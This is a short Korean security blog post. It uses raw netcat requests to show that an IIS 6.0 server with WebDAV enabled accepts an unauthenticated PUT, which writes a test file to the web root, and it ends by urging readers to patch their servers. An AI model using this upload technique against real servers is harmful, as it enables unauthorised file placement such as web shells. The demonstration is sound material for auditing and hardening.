annyoung

IIS, Webdav 침해사고 당하는 이유중 하나 본문

IIS, Webdav 침해사고 당하는 이유중 하나

nopsled 2015. 11. 25. 03:24

nopsled@smleeo3o:~/Documents/python/malware (=`ω´=)$ nc 192.168.0.5 80

OPTIONS / HTTP/1.1

Host: 192.168.0.5


HTTP/1.1 200 OK

Date: Tue, 24 Nov 2015 18:18:42 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

MS-Author-Via: DAV

Content-Length: 0

Accept-Ranges: none

DASL: <DAV:sql>

DAV: 1, 2

Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK

Cache-Control: private




^C

nopsled@smleeo3o:~/Documents/python/malware (=`ω´=)$ nc 192.168.0.5 80

PUT /test.html HTTP/1.1

Host: 192.168.0.5

Content-Length: 4


HTTP/1.1 100 Continue


test

HTTP/1.1 201 Created

Date: Tue, 24 Nov 2015 18:19:36 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Location: http://192.168.0.5/test.html

Content-Length: 0

Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK




Method.. 자기 서버들 확인하고 패치 합시다.😅

'' 카테고리의 다른 글

AWS 문의를 통해 계정 찾기  (0) 2020.08.25
webdav bypass method  (0) 2015.01.06
Web Exploit Tool Kit.pdf  (2) 2014.03.18
MSSQL SQL injection cheat sheet  (0) 2014.03.13
MySQL SQL injection cheat sheet  (0) 2014.03.12
Comments